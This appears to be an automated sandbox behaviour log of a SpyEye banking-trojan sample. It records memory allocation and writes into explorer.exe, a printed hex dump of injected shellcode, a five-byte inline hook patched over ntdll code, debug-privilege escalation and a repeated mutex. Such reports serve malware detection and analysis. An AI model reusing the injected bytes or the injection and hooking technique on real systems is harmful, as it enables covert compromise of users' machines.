C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 1 402871
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 1 4028FC
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 4 4027D4
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 320000 24576 own pid readonly object name not found 1
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\comdlg32.dll write and read and execute unknown 763B0000 299008 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\crypt32.dll write and read and execute unknown 77F60000 483328 own pid read write object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\msimg32.dll write and read and execute unknown 77B20000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\KnownDlls\version.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\wininet.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
\KnownDlls\Normaliz.dll write and read and execute unknown 330000 36864 own pid read write conflicting addresses 1
\KnownDlls\winmm.dll write and read and execute unknown 330000 36864 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 370000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 950000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 950000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 950000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3B0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3B0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3B0000 4096 own pid readonly success or wait 1
none query and write and read commit BD0000 16384 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
C:\WINDOWS\system32\ntdll.dll query and read commit BD0000 65536 own pid readonly success or wait 1 402BE4
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName ComputerName success or wait 1 BD0897
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\System64 success or wait 61 40347C
\BaseNamedObjects\Global\System64 object name exists 1 40347C
Process Activities:
+ Process terminated
PID Filepath Completion Count Source Address
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe success or wait 1 404F44
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe success or wait 0 404F44
Thread Activities:
+ Thread delayed
TID Delay Completion Count Source Address
13924 3s success or wait 1 404E03
13924 0s success or wait 1 404E25
13924 0s success or wait 60 404E71
Memory Activities:
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1636 C:\WINDOWS\explorer.exe 1820000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 404DD4
1636 C:\WINDOWS\explorer.exe 7C90CFEE 5 E9 BF 33 F1 84 success or wait 1 4041FF
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 3E0000 12FFA0 page execute and read and write success or wait 1 40FA57
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe BD0000 12F610 page execute and read and write success or wait 1 3E1A32
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe BF0000 12F610 page execute and read and write success or wait 1 3E2B0E
1636 C:\WINDOWS\explorer.exe 1820000 12FBEC page execute and read and write success or wait 1 404DD4
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 400000 1000 page read and write page readonly success or wait 1 4611FF
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 400000 1000 page readonly page read and write success or wait 1 461214
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 400000 63000 page execute and read and write page readonly success or wait 1 3E0852
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 401000 3E000 page execute and read and write page execute and read and write success or wait 1 3E20AA
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 43F000 18000 page execute and read and write page execute and read and write success or wait 1 3E20AA
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 457000 1000 page read and write page execute and read and write success or wait 1 3E20AA
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 400000 1000 page read and write page execute and read and write success or wait 1 456796
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 400000 1000 page execute and read and write page read and write success or wait 1 4567AB
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe C55FA8 1000 page execute and read and write page execute read success or wait 3 40375F
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 44E15C 1000 page execute and read and write page execute and read and write success or wait 1 404A59
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 451D90 2000 page execute and read and write page execute and read and write success or wait 1 404AB9
3660 C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe 44FD90 3000 page execute and read and write page execute and read and write success or wait 1 404C36
1636 C:\WINDOWS\explorer.exe 7C90CFEE 2000 page execute and read and write page execute read success or wait 1 4041FF
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 1 404C74
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Debug success or wait 2 BD0154
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1963542214
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1963545975
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 1963565485
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1963566949
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1963568449
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 1963569212
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1963570679
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1963571039
Section loaded Path: \KnownDlls\advapi32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 1963573324
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 1963576368
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 1963580338
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 1963586293
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 1963588411
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 1963591332
Section loaded Path: \KnownDlls\comdlg32.dll Access: write and read and execute Type: unknown Baseaddress: 763B0000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 1963600423
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 1963605677
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 1963609800
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 1963615261
Section loaded Path: \KnownDlls\crypt32.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid object name not found 1963625070
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 1963626617
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 1963632571
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1963634169
Section loaded Path: \KnownDlls\msimg32.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 1963644687
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 1963646243
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 1963651563
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 1963661611
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 1963665103
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 1963675994
Section loaded Path: \KnownDlls\version.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1963683901
Section loaded Path: \KnownDlls\wininet.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 1963687153
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 1963693122
Section loaded Path: \KnownDlls\winmm.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 1963701713
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 1963703269
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1963721322
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1963723826
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 1963725906
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 1963738747
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 950000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 1963742377
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 950000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 1963762146
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 950000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 1963820248
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 1963822822
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 1963832817
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1963835750
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 1963838005
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page readonly success or wait 1964107527
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 400000 Length: 1000 New Protection: page readonly Old Protection: page read and write success or wait 1964117733
Memory allocated PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 3E0000 Length: 12FFA0 Allocation Type: null Protection: page execute and read and write success or wait 1964163457
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 400000 Length: 63000 New Protection: page execute and read and write Old Protection: page readonly success or wait 1964188363
Memory allocated PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: BD0000 Length: 12F610 Allocation Type: null Protection: page execute and read and write success or wait 1964190435
Memory allocated PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: BF0000 Length: 12F610 Allocation Type: null Protection: page execute and read and write success or wait 1964191349
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 401000 Length: 3E000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1967640530
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 43F000 Length: 18000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1967642122
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 457000 Length: 1000 New Protection: page read and write Old Protection: page execute and read and write success or wait 1967642489
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page execute and read and write success or wait 1967670996
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 400000 Length: 1000 New Protection: page execute and read and write Old Protection: page read and write success or wait 1967672022
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 1967672391
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 1967672739
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1967673073
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 44E15C Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1967673300
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 1967673564
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 1967673869
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1967674170
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 451D90 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1967674369
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName Name: ComputerName success or wait 1967675080
Privilege adjusted Privilege: Debug On or off: on success or wait 1967679532
File created Path: C:\Recycle.Bin\ Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: false success or wait 1967680069
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1967683503
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 1967683769
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 1967684120
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1967684404
Memory attributes changed PID: 3660 Path: C:\SpyEye_binary_62d0915f2d31d0a060671d31419a0b80.exe Base: 44FD90 Length: 3000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 1967684631
System info queried Type: ProcessInformation success or wait 1967684845
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: BD0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 1967690208
Privilege adjusted Privilege: Debug On or off: on success or wait 1967690745
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1820000 Length: 12FBEC Allocation Type: null Protection: page execute and read and write success or wait 1972168808
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 1972169199
File other operation Disposition: PositionInformation Data: Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 1972169543
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 1972169631
File other operation Disposition: PositionInformation Data: Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 1972169865
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1972169955
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 1972170064
File other operation Disposition: PositionInformation Data: Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 1972170281
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 1972170371
File other operation Disposition: PositionInformation Data: Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 1972171078
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: BD0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 1972171201
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1820000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1972196716
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write Old Protection: page execute read success or wait 1972196884
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 F1 84 success or wait 1972217434
Thread delayed Time: 3 TID: 13924 success or wait 1972222192
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1982957132
Thread delayed Time: 0 TID: 13924 success or wait 1982957517
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1984752853
Thread delayed Time: 0 TID: 13924 success or wait 1984753242
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1985140284
Thread delayed Time: 0 TID: 13924 success or wait 1985140744
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1985529911
Thread delayed Time: 0 TID: 13924 success or wait 1985532047
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1985921342
Thread delayed Time: 0 TID: 13924 success or wait 1985921717
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1986333554
Thread delayed Time: 0 TID: 13924 success or wait 1986333923
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1986704786
Thread delayed Time: 0 TID: 13924 success or wait 1986705201
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1987129729
Thread delayed Time: 0 TID: 13924 success or wait 1987130118
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1987493279
Thread delayed Time: 0 TID: 13924 success or wait 1987497198
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1987878867
Thread delayed Time: 0 TID: 13924 success or wait 1987879321
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1988285980
Thread delayed Time: 0 TID: 13924 success or wait 1988287199
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1988664721
Thread delayed Time: 0 TID: 13924 success or wait 1988665096
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1989056339
Thread delayed Time: 0 TID: 13924 success or wait 1989056710
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1989447882
Thread delayed Time: 0 TID: 13924 success or wait 1989448253
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1989836596
Thread delayed Time: 0 TID: 13924 success or wait 1989837055
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1990230838
Thread delayed Time: 0 TID: 13924 success or wait 1990231292
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1990619531
Thread delayed Time: 0 TID: 13924 success or wait 1990619921
Mutant created Name: \BaseNamedObjects\Global\System64 success or wait 1991010989
Thread delayed Time: 0 TID: 13924 success or wait 1991011361
